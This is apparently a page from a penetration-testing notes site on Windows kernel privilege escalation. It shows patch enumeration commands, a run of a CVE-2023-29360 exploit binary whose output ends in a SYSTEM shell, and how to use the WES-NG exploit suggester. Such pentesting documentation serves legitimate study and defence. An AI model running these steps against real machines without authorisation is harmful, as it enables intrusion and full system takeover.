Kernel

Kernel exploits aim to leverage Windows kernel vulnerabilities and typically result in high privileges, but requires advanced knowledge and carries a high risk of crashing the system.

> systeminfo

Host Name:                 CLIENTWK220
OS Name:                   Microsoft Windows 11 Pro
OS Version:                10.0.22621 N/A Build 22621
...

# enumerate security patches
> Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }

Source        Description      HotFixID      InstalledBy         InstalledOn
------        -----------      --------      -----------         -----------
              Security Update  KB5025239                         5/4/2023 12:00:00 AM
              Security Update  KB5025749                         5/4/2023 12:00:00 AM
              Security Update  KB5017233                         9/25/2022 12:00:00 AM

> whoami
clientwk220\steve

> .\CVE-2023-29360.exe
[+] Device Description: Microsoft Streaming Service Proxy
Hardware IDs:
        "SW\{96E080C7-143C-11D1-B40F-00A0C9223196}"
[+] Device Instance ID: SW\{96E080C7-143C-11D1-B40F-00A0C9223196}\{3C0D501A-140B-11D1-B40F-00A0C9223196}
[+] First mapped _MDL: 20c2f3c00c0
[+] Second mapped _MDL: 20c2f3d0040
[+] Unprivileged token reference: ffffbc053be6d06d
[+] System token reference: ffffbc052ea7d496
Microsoft Windows [Version 10.0.22621.1555]
(c) Microsoft Corporation. All rights reserved.

>whoami
nt authority\systemower

Vulnerabities on Windows OS systems can be found on the Security Update Guide, such as CVE-2023-29360, and their corresponding security updates can be shown on the Microsoft Update Catalog page.

WES-NG

Windows Exploit Suggester – Next Generation (WES-NG) is a post-exploitation tool that analyzes Windows system information to identify unpatched vulnerabilities and associated exploits. It supports all Windows OSs from XP through Windows 11, including server editions.

# Clone the repo
git clone https://github.com/bitsadmin/wesng --depth 1

# Update
wes.py --update

# systeminfo > systeminfo.txt on the target host
wes.py systeminfo.txt -e

This tool can generate a lot of false positives: make sure to check here how to eliminate them. The tool can also validate findings against Microsoft’s Update Catalog using the --muc-lookup option to reduce false positives, as the raw MSRC feed can be incomplete.

PreviousServer Operators NextLocal/Network Service

Last updated 3 months ago

Was this helpful?